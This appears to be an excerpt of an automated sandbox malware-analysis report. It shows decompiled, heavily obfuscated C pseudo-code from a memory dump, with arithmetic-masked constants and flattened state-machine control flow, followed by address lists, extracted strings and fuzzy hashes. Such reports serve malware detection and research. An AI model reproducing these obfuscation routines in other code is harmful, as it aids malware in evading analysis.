				_v1700 = _v1700 | 0x835a29bf;
				_v1700 = _v1700 ^ 0x83751991;
				_v1784 = 0xbe3741;
				_v1784 = _v1784 << 4;
				_v1784 = _v1784 * 0x1a;
				_v1784 = _v1784 ^ 0x3517e86c;
				_v1732 = 0x8a4796;
				_v1732 = _v1732 | 0xec683671;
				_v1732 = _v1732 ^ 0xecefb56e;
				_v1724 = 0xafb559;
				_v1724 = _v1724 / _t359;
				_v1724 = _v1724 ^ 0x00027f36;
				_v1760 = 0xe23551;
				_v1760 = _v1760 + 0xffffea41;
				_v1760 = _v1760 + 0x2ded;
				_v1760 = _v1760 ^ 0x00ed6765;
				_v1744 = 0x7fb5c8;
				_v1744 = _v1744 << 6;
				_v1744 = _v1744 << 7;
				_v1744 = _v1744 ^ 0xf6b6e4c0;
				_v1752 = 0x2393f0;
				_v1752 = _v1752 | 0xb3e88c13;
				_v1752 = _v1752 << 3;
				_v1752 = _v1752 ^ 0x9f53b925;
				_v1796 = 0xad07a1;
				_v1796 = _v1796 >> 9;
				_v1796 = _v1796 + 0xffff6648;
				_v1796 = _v1796 ^ 0xedd7d300;
				_v1796 = _v1796 ^ 0x12298d89;
				_v1788 = 0x464050;
				_v1788 = _v1788 * 0x53;
				_v1788 = _v1788 * 0x4b;
				_v1788 = _v1788 | 0x90f39a79;
				_v1788 = _v1788 ^ 0xbcf5e6c4;
				_v1736 = 0x126672;
				_v1736 = _v1736 ^ 0xc76f4854;
				_v1736 = _v1736 + 0xea09;
				_v1736 = _v1736 ^ 0xc778d571;
				_t355 = _v1732;
				while(1) {
					L1:
					_t345 = 0x2e;
					L2:
					while(_t316 != 0x2904ea) {
						if(_t316 == 0x23236cb) {
							_t301 = E00BBF324(_v1744, _v1752,  &_v1636, _v1796, _t355);
							_t364 = _t364 + 0xc;
							asm("sbb ecx, ecx");
							_t322 =  ~_t301 & 0x07e4fc73;
							L21:
							_t316 = _t322 + 0x2904ea;
							while(1) {
								L1:
								_t345 = 0x2e;
								goto L2;
							}
						}
						if(_t316 == 0x80e015d) {
							_t302 = _v1792;
							__eflags = _v1636 & _t302;
							if((_v1636 & _t302) == 0) {
								_t305 = _a20( &_v1636,  &_v1696);
								asm("sbb ecx, ecx");
								_t322 =  ~_t305 & 0x020931e1;
								__eflags = _t322;
								goto L21;
							}
							__eflags = _v1592 - _t345;
							if(_v1592 != _t345) {
								L18:
								__eflags = _t362;
								if(__eflags != 0) {
									_push(0xbb10dc);
									E00BD06A6(__eflags, _t314, _v1780, E00BD0AD3(_v1748, _v1816, __eflags), _v1812, _v1712,  &_v1044, _v1756);
									E00BBB7EC(_t362, _v1704, _a8,  &_v1044, _v1700, _a20, _v1784);
									_t305 = E00BC2EED(_v1732, _v1724, _v1760, _t309);
									_t364 = _t364 + 0x3c;
									_t345 = 0x2e;
								}
								L17:
								_t316 = 0x23236cb;
								continue;
							}
							__eflags = _v1590;
							if(__eflags == 0) {
								goto L17;
							}
							__eflags = _v1590 - _t345;
							if(_v1590 != _t345) {
								goto L18;
							}
							__eflags = _v1588;
							if(__eflags != 0) {
								goto L18;
							}
							goto L17;
						}
						if(_t316 == 0xa27b548) {
							_t305 = E00BB18AC( &_v524,  &_v1636, _v1764, _v1708);
							_t355 = _t305;
							__eflags = _t305 - 0xffffffff;
							if(__eflags == 0) {
								L25:
								return _t305;
							}
							_t316 = 0x80e015d;
							while(1) {
								L1:
								_t345 = 0x2e;
								goto L2;
							}
						}
						if(_t316 == 0xe5754a6) {
							_push(0xbb10bc);
							E00BC8804(_v1808, __eflags,  &_v524, _v1776, E00BD0AD3(_v1768, _v1800, __eflags), _v1728, _v1772, _t314);
							_t305 = E00BC2EED(_v1720, _v1740, _v1716, _t306);
							_t364 = _t364 + 0x20;
							_t316 = 0xa27b548;
							goto L1;
						}
						if(_t316 != 0xf2ce37d) {
							L24:
							__eflags = _t316 - 0x77a0f0d;
							if(__eflags != 0) {
								continue;
							}
							goto L25;
						}
						_v1668 = _t314;
						_t316 = 0xe5754a6;
					}
					E00BD2729(_v1788, _t355, _v1736);
					_t316 = 0x77a0f0d;
					_t345 = 0x2e;
					goto L24;
				}
			}

0x00bbb7f3
0x00bbb7fd
0x00bbb804
0x00bbb806
0x00bbb80d
0x00bbb814
0x00bbb815
0x00bbb81c
0x00bbb823
0x00bbb825
0x00bbb82a
0x00bbb832
0x00bbb835
0x00bbb843
0x00bbb84a
0x00bbb84f
0x00bbb855
0x00bbb85d
0x00bbb865
0x00bbb86d
0x00bbb875
0x00bbb87a
0x00bbb882
0x00bbb88a
0x00bbb88f
0x00bbb89b
0x00bbb8a0
0x00bbb8a6
0x00bbb8ae
0x00bbb8b6
0x00bbb8c3
0x00bbb8c4
0x00bbb8cd
0x00bbb8d1
0x00bbb8d9
0x00bbb8e1
0x00bbb8e6
0x00bbb8eb
0x00bbb8f3
0x00bbb901
0x00bbb905
0x00bbb90d
0x00bbb91a
0x00bbb91e
0x00bbb926
0x00bbb92e
0x00bbb936
0x00bbb93b
0x00bbb943
0x00bbb94b
0x00bbb958
0x00bbb95c
0x00bbb964
0x00bbb96c
0x00bbb974
0x00bbb97c
0x00bbb984
0x00bbb989
0x00bbb991
0x00bbb999
0x00bbb9a4
0x00bbb9b1
0x00bbb9bc
0x00bbb9c4
0x00bbb9d3
0x00bbb9d4
0x00bbb9d8
0x00bbb9e0
0x00bbb9e8
0x00bbb9ed
0x00bbb9f1
0x00bbb9f9
0x00bbba01
0x00bbba09
0x00bbba11
0x00bbba19
0x00bbba21
0x00bbba29
0x00bbba31
0x00bbba39
0x00bbba41
0x00bbba49
0x00bbba51
0x00bbba59
0x00bbba61
0x00bbba69
0x00bbba71
0x00bbba79
0x00bbba81
0x00bbba86
0x00bbba90
0x00bbba94
0x00bbba9c
0x00bbbaa7
0x00bbbaaf
0x00bbbaba
0x00bbbac5
0x00bbbad0
0x00bbbadb
0x00bbbae3
0x00bbbaed
0x00bbbaf1
0x00bbbaf9
0x00bbbb01
0x00bbbb09
0x00bbbb11
0x00bbbb1f
0x00bbbb23
0x00bbbb2b
0x00bbbb33
0x00bbbb3b
0x00bbbb43
0x00bbbb4b
0x00bbbb53
0x00bbbb58
0x00bbbb5d
0x00bbbb65
0x00bbbb6d
0x00bbbb75
0x00bbbb7a
0x00bbbb82
0x00bbbb8a
0x00bbbb8f
0x00bbbb97
0x00bbbb9f
0x00bbbba7
0x00bbbbb4
0x00bbbbbd
0x00bbbbc1
0x00bbbbc9
0x00bbbbd1
0x00bbbbd9
0x00bbbbe1
0x00bbbbe9
0x00bbbbf1
0x00bbbbf5
0x00bbbbf5
0x00bbbbf7
0x00000000
0x00bbbbf8
0x00bbbc0a
0x00bbbdfa
0x00bbbdff
0x00bbbe06
0x00bbbe08
0x00bbbdda
0x00bbbdda
0x00bbbbf5
0x00bbbbf5
0x00bbbbf7
0x00000000
0x00bbbbf7
0x00bbbbf5
0x00bbbc16
0x00bbbcd7
0x00bbbcdb
0x00bbbce2
0x00bbbdc7
0x00bbbdd2
0x00bbbdd4
0x00bbbdd4
0x00000000
0x00bbbdd4
0x00bbbce8
0x00bbbcf0
0x00bbbd1c
0x00bbbd1c
0x00bbbd1e
0x00bbbd28
0x00bbbd59
0x00bbbd8f
0x00bbbda7
0x00bbbdac
0x00bbbdb1
0x00bbbdb1
0x00bbbd12
0x00bbbd12
0x00000000
0x00bbbd12
0x00bbbcf2
0x00bbbcfb
0x00000000
0x00000000
0x00bbbcfd
0x00bbbd05
0x00000000
0x00000000
0x00bbbd07
0x00bbbd10
0x00000000
0x00000000
0x00000000
0x00bbbd10
0x00bbbc22
0x00bbbcbb
0x00bbbcc0
0x00bbbcc4
0x00bbbcc7
0x00bbbe3e
0x00bbbe3e
0x00bbbe3e
0x00bbbccd
0x00bbbbf5
0x00bbbbf5
0x00bbbbf7
0x00000000
0x00bbbbf7
0x00bbbbf5
0x00bbbc2a
0x00bbbc4e
0x00bbbc75
0x00bbbc90
0x00bbbc95
0x00bbbc98
0x00000000
0x00bbbc98
0x00bbbc32
0x00bbbe28
0x00bbbe28
0x00bbbe2e
0x00000000
0x00000000
0x00000000
0x00bbbe2e
0x00bbbc38
0x00bbbc3f
0x00bbbc3f
0x00bbbe1a
0x00bbbe22
0x00bbbe27
0x00000000
0x00bbbe27

Strings

zk, xrefs: 00BBB92E
b:, xrefs: 00BBB882
`8, xrefs: 00BBB8A6
P@F, xrefs: 00BBBBA7
q6h, xrefs: 00BBBB01
rpJ, xrefs: 00BBB865
eg, xrefs: 00BBBB43
'~, xrefs: 00BBB9A4

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: '~$P@F$`8$eg$q6h$rpJ$b:$zk
API String ID: 0-3468609645
Opcode ID: 420550c01ebeb9e95aac8a32c4b7322448501d41a4c985652a67df5cacbd88cf
Instruction ID: e0cd4f871c0473a7b461c7b9f22d8b5a49ba5a52e6a47ef106d05e2083025aca
Opcode Fuzzy Hash: 420550c01ebeb9e95aac8a32c4b7322448501d41a4c985652a67df5cacbd88cf
Instruction Fuzzy Hash: 0AE123714083809FC768CF65C589AAFBBE1FBC4758F108A1DF29A86260D7B59948CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BC77A7, Relevance: 10.3, Strings: 8, Instructions: 275
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00BC77A7(void* __ecx, void* __edx, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v16;
				intOrPtr _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				void* _t279;
				void* _t306;
				intOrPtr _t311;
				void* _t314;
				intOrPtr* _t317;
				void* _t319;
				intOrPtr _t343;
				signed int _t346;
				signed int _t347;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int _t351;
				signed int _t352;
				void* _t354;
				void* _t355;

				_t317 = _a8;
				_t345 = _a4;
				_push(_a16);
				_push(_a12);
				_push(_t317);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E00BB8002(_t279);
				_v12 = 0xb35823;
				_t343 = 0;
				_v8 = 0;
				_t355 = _t354 + 0x18;
				_v52 = 0x5f70f;
				_t319 = 0x2850cfc;
				_t346 = 0x2d;
				_v52 = _v52 * 0x4a;
				_v52 = _v52 * 0x37;
				_v52 = _v52 ^ 0x5ed5d87b;
				_v72 = 0xac0067;
				_v72 = _v72 + 0xda9f;
				_v72 = _v72 / _t346;
				_v72 = _v72 ^ 0x0003d75a;
				_v24 = 0xad63b0;
				_v24 = _v24 << 4;
				_v24 = _v24 ^ 0x0ad63b00;
				_v108 = 0x3c5e3b;
				_v108 = _v108 + 0x2f0c;
				_v108 = _v108 >> 4;
				_t347 = 0xd;
				_v108 = _v108 * 0x7e;
				_v108 = _v108 ^ 0x01dcd858;
				_v44 = 0x32c28a;
				_v44 = _v44 ^ 0x3f3f01ee;
				_v44 = _v44 * 0x7b;
				_v44 = _v44 ^ 0x4b9ce10c;
				_v76 = 0x3ddbfc;
				_v76 = _v76 >> 2;
				_v76 = _v76 | 0x9bb0ab60;
				_v76 = _v76 ^ 0x9bbfffff;
				_v120 = 0xf943ab;
				_v120 = _v120 | 0xc7c026f8;
				_v120 = _v120 ^ 0x3ff0ca81;
				_v120 = _v120 << 9;
				_v120 = _v120 ^ 0x135af400;
				_v100 = 0x8b91cc;
				_v100 = _v100 * 0x4e;
				_v100 = _v100 / _t347;
				_v100 = _v100 >> 4;
				_v100 = _v100 ^ 0x00385303;
				_v104 = 0x8f66d0;
				_v104 = _v104 + 0x8dad;
				_v104 = _v104 * 0x6c;
				_v104 = _v104 >> 6;
				_v104 = _v104 ^ 0x00f24a23;
				_v48 = 0x2a1ce9;
				_v48 = _v48 + 0xffffc76e;
				_v48 = _v48 | 0x94fbc901;
				_v48 = _v48 ^ 0x94fb8f6b;
				_v28 = 0xa0e7f8;
				_v28 = _v28 ^ 0xe50e8d20;
				_v28 = _v28 ^ 0xe5afb84b;
				_v56 = 0x37101c;
				_v56 = _v56 + 0xffff3178;
				_v56 = _v56 << 8;
				_v56 = _v56 ^ 0x3646486a;
				_v112 = 0x2380b3;
				_t348 = 0x7c;
				_v112 = _v112 / _t348;
				_v112 = _v112 << 2;
				_v112 = _v112 << 6;
				_v112 = _v112 ^ 0x004d709f;
				_v32 = 0xa7aa36;
				_t349 = 0xc;
				_v32 = _v32 / _t349;
				_v32 = _v32 ^ 0x00093c5d;
				_v116 = 0xd3367b;
				_t350 = 0x48;
				_v116 = _v116 * 0x11;
				_v116 = _v116 | 0xd6138dc5;
				_v116 = _v116 << 3;
				_v116 = _v116 ^ 0xf0b48521;
				_v60 = 0xd01cc4;
				_v60 = _v60 ^ 0x5b615a1e;
				_v60 = _v60 / _t350;
				_v60 = _v60 ^ 0x014bce76;
				_v124 = 0xe44278;
				_v124 = _v124 + 0x3363;
				_v124 = _v124 + 0x6e81;
				_t351 = 0x62;
				_v124 = _v124 * 0x59;
				_v124 = _v124 ^ 0x4f9bf5bc;
				_v64 = 0xc011b2;
				_v64 = _v64 | 0x61522488;
				_v64 = _v64 >> 4;
				_v64 = _v64 ^ 0x06119d00;
				_v68 = 0xcc6b87;
				_v68 = _v68 ^ 0xe050b22e;
				_v68 = _v68 + 0xedae;
				_v68 = _v68 ^ 0xe09fb4c2;
				_v36 = 0x8736e8;
				_v36 = _v36 + 0xffffc713;
				_v36 = _v36 ^ 0x008d8f44;
				_v80 = 0x289ee5;
				_v80 = _v80 << 6;
				_v80 = _v80 + 0xffff2992;
				_v80 = _v80 ^ 0x0a2a5a25;
				_v128 = 0x3c4dae;
				_v128 = _v128 << 1;
				_v128 = _v128 << 0xf;
				_v128 = _v128 + 0xffffb8bf;
				_v128 = _v128 ^ 0x4dad55d9;
				_v84 = 0xd4a908;
				_v84 = _v84 / _t351;
				_v84 = _v84 ^ 0x4ca71de2;
				_v84 = _v84 ^ 0x4ca9e37f;
				_v88 = 0x336959;
				_v88 = _v88 ^ 0xddb5ca70;
				_v88 = _v88 + 0xc2c;
				_v88 = _v88 + 0xf661;
				_v88 = _v88 ^ 0xdd87f50d;
				_v92 = 0xde756f;
				_v92 = _v92 ^ 0x47999631;
				_v92 = _v92 + 0x1ea5;
				_v92 = _v92 | 0x4f1073f6;
				_v92 = _v92 ^ 0x4f5c16aa;
				_v40 = 0x1e7d4a;
				_v40 = _v40 ^ 0x25c6f90f;
				_t352 = 0x16;
				_v40 = _v40 * 0x18;
				_v40 = _v40 ^ 0x8c453913;
				_v96 = 0x30017f;
				_v96 = _v96 << 8;
				_v96 = _v96 + 0xffffa399;
				_v96 = _v96 / _t352;
				_v96 = _v96 ^ 0x0224b19e;
				while(_t319 != 0x2850cfc) {
					if(_t319 == 0x50cde1c) {
						_push(_t319);
						_t306 = E00BB938F( *((intOrPtr*)(_t345 + 4)), _v100, _v104, _v48,  &_v16,  *_t345, _v52, _t319, _v24, _v28, _t343, _v56, _v108, _v112, _v32,  *((intOrPtr*)( *0xbd5be0 + 0x70)));
						_t355 = _t355 + 0x3c;
						if(_t306 == _v44) {
							_t319 = 0xaf2ad2d;
							continue;
						}
					} else {
						if(_t319 == 0x9211359) {
							E00BBF699(_v88, _v20, _v92, _v40, _v96);
						} else {
							if(_t319 == 0xaf2ad2d) {
								_push(_t319);
								_t311 = E00BC6F53(_v16);
								_v20 = _t311;
								if(_t311 != 0) {
									_t319 = 0xe14d48c;
									continue;
								}
							} else {
								if(_t319 != 0xe14d48c) {
									L13:
									if(_t319 != 0x1aa43b4) {
										continue;
									} else {
									}
								} else {
									_push(_t319);
									_t314 = E00BB938F( *((intOrPtr*)(_t345 + 4)), _v124, _v64, _v68,  &_v16,  *_t345, _v72, _t319, _v76, _v36, _v20, _v80, _v16, _v128, _v84,  *((intOrPtr*)( *0xbd5be0 + 0x70)));
									_t355 = _t355 + 0x3c;
									if(_t314 == _v120) {
										 *_t317 = _v20;
										_t343 = 1;
										 *((intOrPtr*)(_t317 + 4)) = _v16;
									} else {
										_t319 = 0x9211359;
										continue;
									}
								}
							}
						}
					}
					return _t343;
				}
				_t319 = 0x50cde1c;
				goto L13;
			}

0x00bc77ae
0x00bc77b7
0x00bc77bf
0x00bc77c6
0x00bc77cd
0x00bc77ce
0x00bc77cf
0x00bc77d0
0x00bc77d1
0x00bc77d6
0x00bc77e1
0x00bc77e3
0x00bc77ea
0x00bc77ed
0x00bc77fc
0x00bc7803
0x00bc7806
0x00bc780f
0x00bc7813
0x00bc781b
0x00bc7823
0x00bc7833
0x00bc7837
0x00bc783f
0x00bc784a
0x00bc7852
0x00bc785d
0x00bc7865
0x00bc786d
0x00bc7877
0x00bc7878
0x00bc787c
0x00bc7884
0x00bc788c
0x00bc7899
0x00bc789d
0x00bc78a5
0x00bc78ad
0x00bc78b2
0x00bc78ba
0x00bc78c2
0x00bc78ca
0x00bc78d2
0x00bc78da
0x00bc78df
0x00bc78e7
0x00bc78f4
0x00bc78fe
0x00bc7902
0x00bc7907
0x00bc790f
0x00bc7917
0x00bc7924
0x00bc7928
0x00bc792d
0x00bc7935
0x00bc793d
0x00bc7945
0x00bc794d
0x00bc7955
0x00bc795d
0x00bc7965
0x00bc796d
0x00bc7975
0x00bc797f
0x00bc7984
0x00bc798c
0x00bc799a
0x00bc799f
0x00bc79a5
0x00bc79aa
0x00bc79af
0x00bc79b7
0x00bc79c3
0x00bc79c8
0x00bc79ce
0x00bc79d6
0x00bc79e3
0x00bc79e6
0x00bc79ea
0x00bc79f2
0x00bc79f7
0x00bc79ff
0x00bc7a07
0x00bc7a17
0x00bc7a1b
0x00bc7a23
0x00bc7a2b
0x00bc7a33
0x00bc7a40
0x00bc7a41
0x00bc7a45
0x00bc7a4d
0x00bc7a55
0x00bc7a5d
0x00bc7a62
0x00bc7a6a
0x00bc7a72
0x00bc7a7a
0x00bc7a82
0x00bc7a8a
0x00bc7a92
0x00bc7a9a
0x00bc7aa2
0x00bc7aaa
0x00bc7aaf
0x00bc7ab7
0x00bc7abf
0x00bc7ac7
0x00bc7acb
0x00bc7ad0
0x00bc7ad8
0x00bc7ae0
0x00bc7aee
0x00bc7af2
0x00bc7afa
0x00bc7b02
0x00bc7b0a
0x00bc7b12
0x00bc7b1a
0x00bc7b22
0x00bc7b2a
0x00bc7b32
0x00bc7b3a
0x00bc7b42
0x00bc7b4a
0x00bc7b52
0x00bc7b5c
0x00bc7b6b
0x00bc7b6c
0x00bc7b70
0x00bc7b78
0x00bc7b80
0x00bc7b85
0x00bc7b98
0x00bc7b9c
0x00bc7ba4
0x00bc7bb2
0x00bc7c7a
0x00bc7cc1
0x00bc7cc6
0x00bc7ccd
0x00bc7ccf
0x00000000
0x00bc7ccf
0x00bc7bb8
0x00bc7bbe
0x00bc7d18
0x00bc7bc4
0x00bc7bca
0x00bc7c55
0x00bc7c56
0x00bc7c5b
0x00bc7c65
0x00bc7c6b
0x00000000
0x00bc7c6b
0x00bc7bcc
0x00bc7bd2
0x00bc7cdb
0x00bc7ce1
0x00000000
0x00000000
0x00bc7ce7
0x00bc7bd8
0x00bc7bdd
0x00bc7c2a
0x00bc7c2f
0x00bc7c36
0x00bc7cf2
0x00bc7cf4
0x00bc7cfc
0x00bc7c3c
0x00bc7c3c
0x00000000
0x00bc7c3c
0x00bc7c36
0x00bc7bd2
0x00bc7bca
0x00bc7bbe
0x00bc7d2c
0x00bc7d2c
0x00bc7cd9
0x00000000

Strings

g, xrefs: 00BC781B
c3, xrefs: 00BC7A2B
;^<, xrefs: 00BC785D
%Z*, xrefs: 00BC7AB7
jHF6, xrefs: 00BC7984
Yi3, xrefs: 00BC7B02
xB, xrefs: 00BC7A23
]<, xrefs: 00BC79CE

Memory Dump Source

Source File: 00000000.00000002.695194843.0000000000BB0000.00000040.00000010.sdmp, Offset: 00BB0000, based on PE: true

Yara matches

Similarity

API ID:
String ID: %Z*$;^<$Yi3$]<$c3$g$jHF6$xB
API String ID: 0-3236717411
Opcode ID: 5c27db97cce824e30889ac911b71ff8251ca0e8161782f82a77029dd554457d0
Instruction ID: 8723ef3f4cb892b6315d5f13bfe675620c31990b488208ba269b9aed4b0bf39c
Opcode Fuzzy Hash: 5c27db97cce824e30889ac911b71ff8251ca0e8161782f82a77029dd554457d0
Instruction Fuzzy Hash: 2FD1FDB25083819FD764CF65C58AA1BFBE1FBC4748F10891DF2968A260D7B29949CF43

Uniqueness

Uniqueness Score: -1.00%

Function 00BC710D, Relevance: 10.2, Strings: 8, Instructions: 235
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E00BC710D(void* __ecx) {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				void* _t272;
				signed int _t284;
				signed int _t285;
				signed int _t286;
				signed int _t287;
				void* _t312;
				void* _t313;
				signed int* _t316;

				_t316 =  &_v1672;
				_v1588 = 0x9be929;
				_v1588 = _v1588 << 0x10;
				_v1588 = _v1588 ^ 0xe92e0db6;
				_v1596 = 0xefb4d;
				_v1596 = _v1596 << 0xe;
				_v1596 = _v1596 ^ 0xbedbf0f4;
				_v1656 = 0xf4618b;
				_v1656 = _v1656 >> 0xd;
				_v1656 = _v1656 << 0xd;
				_v1656 = _v1656 + 0xffff48eb;
				_v1656 = _v1656 ^ 0x00ff6e6a;
				_v1624 = 0xf777ef;
				_v1624 = _v1624 ^ 0xb1e758e7;
				_t312 = __ecx;
				_t313 = 0xe9a37bd;
				_t284 = 0x63;
				_v1624 = _v1624 / _t284;
				_v1624 = _v1624 ^ 0x01c35fcc;
				_v1604 = 0xce5610;
				_v1604 = _v1604 >> 9;
				_v1604 = _v1604 >> 4;
				_v1604 = _v1604 ^ 0x000bc6c1;
				_v1580 = 0x4c4a47;
				_t39 =  &_v1580; // 0x4c4a47
				_t285 = 0x1c;
				_v1580 =  *_t39 * 0xa;
				_v1580 = _v1580 ^ 0x02fc6b1b;
				_v1664 = 0x5b991d;
				_v1664 = _v1664 ^ 0xbcb68de4;
				_v1664 = _v1664 << 1;
				_v1664 = _v1664 * 0x39;
				_v1664 = _v1664 ^ 0x21971d3f;
				_v1564 = 0xe454a9;
				_v1564 = _v1564 ^ 0x737d3de0;
				_v1564 = _v1564 ^ 0x739509af;
				_v1648 = 0xafda8f;
				_v1648 = _v1648 + 0xffff3588;
				_v1648 = _v1648 + 0xc326;
				_v1648 = _v1648 << 1;
				_v1648 = _v1648 ^ 0x01575429;
				_v1628 = 0x49c36b;
				_v1628 = _v1628 ^ 0x6b772318;
				_v1628 = _v1628 << 6;
				_v1628 = _v1628 ^ 0xcfbe27ae;
				_v1568 = 0x3251be;
				_t286 = 0x79;
				_v1568 = _v1568 / _t285;
				_v1568 = _v1568 ^ 0x0007548f;
				_v1672 = 0x5cc1a6;
				_v1672 = _v1672 | 0x5a4d7772;
				_t85 =  &_v1672; // 0x5a4d7772
				_v1672 =  *_t85 / _t286;
				_v1672 = _v1672 + 0xffff6c58;
				_v1672 = _v1672 ^ 0x00b09a2a;
				_v1584 = 0x757b2e;
				_v1584 = _v1584 + 0xffff31dd;
				_v1584 = _v1584 ^ 0x0073a872;
				_v1592 = 0x3ce70d;
				_t287 = 0x5a;
				_v1592 = _v1592 * 0x72;
				_v1592 = _v1592 ^ 0x1b1a78e7;
				_v1572 = 0xc163e;
				_v1572 = _v1572 / _t287;
				_v1572 = _v1572 ^ 0x00036a4e;
				_v1612 = 0x1ca23b;
				_v1612 = _v1612 + 0xffff6628;
				_v1612 = _v1612 + 0x1135;
				_v1612 = _v1612 ^ 0x00167c6b;
				_v1620 = 0xb38e61;
				_t288 = 0x49;
				_v1620 = _v1620 * 0x7f;
				_v1620 = _v1620 ^ 0x782f0939;
				_v1620 = _v1620 ^ 0x213f4aa4;
				_v1660 = 0x74d6dd;
				_v1660 = _v1660 + 0x68bb;
				_v1660 = _v1660 | 0xf5cb287a;
				_v1660 = _v1660 + 0xffff9d3f;
				_v1660 = _v1660 ^ 0xf5f4c6ec;
				_v1668 = 0x9c774d;
				_v1668 = _v1668 + 0x22c8;
				_v1668 = _v1668 << 0x10;
				_v1668 = _v1668 ^ 0xe350e68a;
				_v1668 = _v1668 ^ 0x79426435;
				_v1644 = 0xa28120;
				_v1644 = _v1644 * 0x27;
				_v1644 = _v1644 + 0xfffff00c;
				_v1644 = _v1644 << 7;
				_v1644 = _v1644 ^ 0x60c0e5d8;
				_v1652 = 0x75cead;
				_v1652 = _v1652 * 0x33;
				_v1652 = _v1652 >> 0xf;
				_v1652 = _v1652 / _t288;
				_v1652 = _v1652 ^ 0x00049b2b;
				_v1632 = 0x459ea;
				_v1632 = _v1632 | 0x22ad5e03;
				_v1632 = _v1632 * 0x26;
				_v1632 = _v1632 ^ 0x25bf04a7;
				_v1636 = 0x8a7d08;
				_v1636 = _v1636 << 5;
				_v1636 = _v1636 ^ 0x7cd9bfd1;
				_v1636 = _v1636 ^ 0x6d9c0e1c;
				_v1600 = 0x3382a1;
				_v1600 = _v1600 + 0x6640;
				_v1600 = _v1600 ^ 0x84283fdc;
				_v1600 = _v1600 ^ 0x841a5854;
				_v1608 = 0xe3f220;
				_v1608 = _v1608 + 0xffffc788;
				_v1608 = _v1608 * 0x1b;
				_v1608 = _v1608 ^ 0x180267f4;
				_v1576 = 0xc0d208;
				_v1576 = _v1576 * 0x66;
				_v1576 = _v1576 ^ 0x4cdc688a;
				_v1616 = 0x603003;
				_v1616 = _v1616 + 0xffffdb50;
				_v1616 = _v1616 * 0x36;
				_v1616 = _v1616 ^ 0x14408960;
				_v1640 = 0x8164cd;
				_v1640 = _v1640 + 0xffff29f7;
				_v1640 = _v1640 << 0x10;
				_v1640 = _v1640 ^ 0x8ec5a6e2;
				do {
					while(_t313 != 0x7d63619) {
						if(_t313 == 0xd6a7cf6) {
							E00BB24AA(_t288, _v1588, __eflags,  &_v1560, _v1596, _v1656, _v1624);
							 *((short*)(E00BC0F17(_v1604, _v1580,  &_v1560, _v1664, _v1564))) = 0;
							E00BCCC3F(_v1648,  &_v520, __eflags, _v1628);
							_push(0xbb11d0);
							E00BD06A6(__eflags,  &_v1560, _v1584, E00BD0AD3(_v1568, _v1672, __eflags), _v1592, _v1572,  &_v1040, _v1612);
							E00BC2EED(_v1620, _v1660, _v1668, _t278);
							_t288 =  &_v1040;
							_t272 = E00BD3306( &_v1040, _v1644, _v1652, _v1632, _t312, _v1636);
							_t316 =  &(_t316[0x16]);
							__eflags = _t272;
							if(__eflags != 0) {
								_t313 = 0x7d63619;
								continue;
							}
						} else {
							if(_t313 != 0xe9a37bd) {
								goto L8;
							} else {
								_t313 = 0xd6a7cf6;
								continue;
							}
						}
						goto L9;
					}
					_push(_v1640);
					_push(0);
					_push( &_v1040);
					_push(_v1616);
					_push(_v1576);
					_push(_v1608);
					_push(0);
					_push(0);
					_t272 = E00BD06EF(_v1600, __eflags);
					_t316 =  &(_t316[8]);
					_t313 = 0x5b6dba;
					L8:
					__eflags = _t313 - 0x5b6dba;
				} while (__eflags != 0);
				L9:
				return _t272;
			}

0x00bc710d
0x00bc7113
0x00bc711d
0x00bc7122
0x00bc712a
0x00bc7132
0x00bc7137
0x00bc713f
0x00bc7147
0x00bc714c
0x00bc7151
0x00bc7159
0x00bc7161
0x00bc7169
0x00bc717a
0x00bc717c
0x00bc7181
0x00bc7186
0x00bc718c
0x00bc7194
0x00bc719c
0x00bc71a1
0x00bc71a6
0x00bc71ae
0x00bc71b6
0x00bc71bb
0x00bc71be
0x00bc71c2
0x00bc71ca
0x00bc71d2
0x00bc71da
0x00bc71e3
0x00bc71e7
0x00bc71ef
0x00bc71f7
0x00bc71ff
0x00bc7207
0x00bc720f
0x00bc7217
0x00bc721f
0x00bc7223
0x00bc722b
0x00bc7233
0x00bc723b
0x00bc7240
0x00bc7248
0x00bc7256
0x00bc7257
0x00bc725d
0x00bc7265
0x00bc726d
0x00bc7275
0x00bc727d
0x00bc7281
0x00bc7289
0x00bc7291
0x00bc7299
0x00bc72a1
0x00bc72a9
0x00bc72b6
0x00bc72b7
0x00bc72bb
0x00bc72c5
0x00bc72d5
0x00bc72db
0x00bc72e8
0x00bc72f0
0x00bc72f8
0x00bc7300
0x00bc7308
0x00bc7315
0x00bc7316
0x00bc731a
0x00bc7322
0x00bc732a
0x00bc7332
0x00bc733a
0x00bc7342
0x00bc734a
0x00bc7352
0x00bc735a
0x00bc7362
0x00bc7367
0x00bc736f
0x00bc7377
0x00bc7384
0x00bc7388
0x00bc7390
0x00bc7395
0x00bc739d
0x00bc73aa
0x00bc73ae
0x00bc73b9
0x00bc73bd
0x00bc73c5
0x00bc73cd
0x00bc73da
0x00bc73de
0x00bc73e6
0x00bc73ee
